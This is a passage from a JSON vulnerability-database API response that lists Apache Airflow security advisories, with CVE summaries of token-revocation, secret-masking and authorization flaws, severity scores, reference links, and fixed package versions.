"MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-23T15:47:06Z/" } ], "url": "https://github.com/apache/airflow/pull/61883" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65995", "reference_id": "CVE-2025-65995", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65995" }, { "reference_url": "https://github.com/advisories/GHSA-gfw7-2v73-69wg", "reference_id": "GHSA-gfw7-2v73-69wg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gfw7-2v73-69wg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39492?format=api", "purl": "pkg:pypi/apache-airflow@3.1.5rc1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bftx-1hw8-z7f1" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-gbn8-8y8d-gkgw" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-r2bq-ukcr-1fa3" }, { "vulnerability": "VCID-srr5-3rxv-rkg8" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-u2bm-499h-2qfh" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.5rc1" } ], "aliases": [ "CVE-2025-65995", "GHSA-gfw7-2v73-69wg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-881f-vbac-rucw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80377?format=api", "vulnerability_id": "VCID-8aa5-hyy9-e3f1", "summary": "A bug in Apache Airflow's auth manager logout handling left previously-issued JWT tokens valid after the user clicked logout in the UI: the logout flow for `FabAuthManager` and `KeycloakAuthManager` did not actually reach the underlying `revoke_token()` call, so the JWT remained accepted by the API server until its natural expiry. An attacker holding a previously-issued JWT for a logged-out user could continue to make authenticated API calls as that user. Affects deployments configured with `FabAuthManager` or `KeycloakAuthManager` (the bug does not affect SimpleAuthManager). This is a residual gap in the fix for CVE-2025-57735, which addressed cookie-side invalidation in PR #57992 / PR #61339 but did not cover the provider-side `revoke_token()` reachability in the FAB / Keycloak code paths. Users who already upgraded for CVE-2025-57735 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the FAB / Keycloak logout paths.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-48726", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13639", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13757", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-48726" }, { "reference_url": "https://lists.apache.org/thread/630jg4z6cjkv4m2yv2ljgmf1zhdj1vqx", "reference_id": "630jg4z6cjkv4m2yv2ljgmf1zhdj1vqx", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-02T16:03:20Z/" } ], "url": "https://lists.apache.org/thread/630jg4z6cjkv4m2yv2ljgmf1zhdj1vqx" }, { "reference_url": "https://github.com/apache/airflow/pull/67289", "reference_id": "67289", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-02T16:03:20Z/" } ], "url": "https://github.com/apache/airflow/pull/67289" }, { "reference_url": "https://www.cve.org/CVERecord?id=CVE-2025-57735", "reference_id": "CVERecord?id=CVE-2025-57735", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-02T16:03:20Z/" } ], "url": "https://www.cve.org/CVERecord?id=CVE-2025-57735" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93948?format=api", "purl": "pkg:pypi/apache-airflow@3.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.2" } ], "aliases": [ "BIT-airflow-2026-48726", "CVE-2026-48726", "PYSEC-2026-187" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8aa5-hyy9-e3f1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/70597?format=api", "vulnerability_id": "VCID-9y7c-yxq4-f7ha", "summary": "A bug in Apache Airflow's rendered-template field handling caused nested sensitive-key masking (e.g. nested `password` / `token` / `secret` / `api_key` keys inside a JSON template structure) to be bypassed when the rendered field exceeded `[core] max_templated_field_length`: Airflow stringified the structure before redaction, losing the nested key context, and persisted the plaintext value into `rendered_fields`. An authenticated UI/API user with permission to read rendered template fields could harvest secret values intended to be masked. Affects deployments where Dag authors pass structured JSON to operators with nested sensitive keys. This is a variant of `CWE-200` previously addressed for the user-registered `mask_secret()` patterns in CVE-2025-68438; that fix did not cover the nested sensitive-keyword allowlist. Users who already upgraded for CVE-2025-68438 should additionally upgrade to `apache-airflow` 3.2.2 or later to cover the nested-key path.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42360", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12918", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.13013", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42360" }, { "reference_url": "https://github.com/apache/airflow/pull/65906", "reference_id": "65906", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-01T13:55:15Z/" } ], "url": "https://github.com/apache/airflow/pull/65906" }, { "reference_url": "https://lists.apache.org/thread/obj79bpxnl7r5olz1gsn0g94y88glnl4", "reference_id": "obj79bpxnl7r5olz1gsn0g94y88glnl4", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-01T13:55:15Z/" } ], "url": "https://lists.apache.org/thread/obj79bpxnl7r5olz1gsn0g94y88glnl4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93948?format=api", "purl": "pkg:pypi/apache-airflow@3.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.2" } ], "aliases": [ "BIT-airflow-2026-42360", "CVE-2026-42360", "PYSEC-2026-172" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9y7c-yxq4-f7ha" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/77508?format=api", "vulnerability_id": "VCID-ap8j-6689-kfgd", "summary": "Secrets in Variables saved as JSON dictionaries were not properly redacted - in case thee variables were retrieved by the user the secrets stored as nested fields were not masked.\n\nIf you do not store variables with sensitive values in JSON form, you are not affected. Otherwise please upgrade to Apache Airflow 3.2.0 that has the fix implemented", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32690", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24122", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24318", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32690" }, { "reference_url": "https://github.com/advisories/GHSA-w9r4-94fj-xp69", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w9r4-94fj-xp69" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-19.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-19.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32690", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32690" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/17/6", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/17/6" }, { "reference_url": "https://github.com/apache/airflow/pull/63480", "reference_id": "63480", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:11:00Z/" } ], "url": "https://github.com/apache/airflow/pull/63480" }, { "reference_url": "https://lists.apache.org/thread/7rnzxofntcznqxnhsmjvvlvygwph7rn5", "reference_id": "7rnzxofntcznqxnhsmjvvlvygwph7rn5", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:11:00Z/" } ], "url": "https://lists.apache.org/thread/7rnzxofntcznqxnhsmjvvlvygwph7rn5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/92193?format=api", "purl": "pkg:pypi/apache-airflow@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.0" } ], "aliases": [ "BIT-airflow-2026-32690", "CVE-2026-32690", "GHSA-w9r4-94fj-xp69", "PYSEC-2026-19" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ap8j-6689-kfgd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93140?format=api", "vulnerability_id": "VCID-bftx-1hw8-z7f1", "summary": "In Apache Airflow versions before 3.1.6, when rendered template fields in a Dag exceed [core] max_templated_field_length, sensitive values could be exposed in cleartext in the Rendered Templates UI. This occurred because serialization of those fields used a secrets masker instance that did not include user-registered mask_secret() patterns, so secrets were not reliably masked before truncation and display.\n\nUsers are recommended to upgrade to 3.1.6 or later, which fixes this issue", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68438", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07594", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00025", "scoring_system": "epss", "scoring_elements": "0.07557", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68438" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-9.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-9.yaml" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/01/15/5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/01/15/5" }, { "reference_url": "https://lists.apache.org/thread/55n7b4nlsz3vo5n4h5lrj9bfsk8ctyff", "reference_id": "55n7b4nlsz3vo5n4h5lrj9bfsk8ctyff", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-16T16:09:05Z/" } ], "url": "https://lists.apache.org/thread/55n7b4nlsz3vo5n4h5lrj9bfsk8ctyff" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68438", "reference_id": "CVE-2025-68438", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68438" }, { "reference_url": "https://github.com/advisories/GHSA-3qmm-r55x-hpxx", "reference_id": "GHSA-3qmm-r55x-hpxx", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3qmm-r55x-hpxx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/37837?format=api", "purl": "pkg:pypi/apache-airflow@3.1.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-gbn8-8y8d-gkgw" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-srr5-3rxv-rkg8" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.6" } ], "aliases": [ "BIT-airflow-2025-68438", "CVE-2025-68438", "GHSA-3qmm-r55x-hpxx", "PYSEC-2026-9" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bftx-1hw8-z7f1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/66578?format=api", "vulnerability_id": "VCID-bkwd-x3qh-57ga", "summary": "Apache Airflow versions 3.1.0 through 3.1.7 missing authorization vulnerability in the Execution API's Human-in-the-Loop (HITL) endpoints that allows any authenticated task instance to read, approve, or reject HITL workflows belonging to any other task instance.\n\n\nUsers are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30911", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.1355", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13666", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30911" }, { "reference_url": "https://github.com/advisories/GHSA-8x34-9q3v-h7g8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8x34-9q3v-h7g8" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-17.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-17.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30911", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30911" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/03/17/2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/03/17/2" }, { "reference_url": "https://lists.apache.org/thread/1rs2v7fcko2otl6n9ytthcj87cmsgx51", "reference_id": "1rs2v7fcko2otl6n9ytthcj87cmsgx51", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T13:41:43Z/" } ], "url": "https://lists.apache.org/thread/1rs2v7fcko2otl6n9ytthcj87cmsgx51" }, { "reference_url": "https://github.com/apache/airflow/pull/62886", "reference_id": "62886", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T13:41:43Z/" } ], "url": "https://github.com/apache/airflow/pull/62886" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/91427?format=api", "purl": "pkg:pypi/apache-airflow@3.1.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-6vv8-kr7f-mubf" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.8" } ], "aliases": [ "BIT-airflow-2026-30911", "CVE-2026-30911", "GHSA-8x34-9q3v-h7g8", "PYSEC-2026-17" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bkwd-x3qh-57ga" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69557?format=api", "vulnerability_id": "VCID-bva2-dpg3-m7hv", "summary": "Apache Airflow versions 3.1.0 through 3.1.7 /ui/dependencies endpoint returns the full DAG dependency graph without filtering by authorized DAG IDs. This allows an authenticated user with only DAG Dependencies permission to enumerate DAGs they are not authorized to view.\n\n\nUsers are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28563", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11183", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00036", "scoring_system": "epss", "scoring_elements": "0.11249", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28563" }, { "reference_url": "https://github.com/advisories/GHSA-x3fv-96qh-67m7", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x3fv-96qh-67m7" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-15.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-15.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28563", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28563" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/03/17/5", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/03/17/5" }, { "reference_url": "https://github.com/apache/airflow/pull/62046", "reference_id": "62046", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": 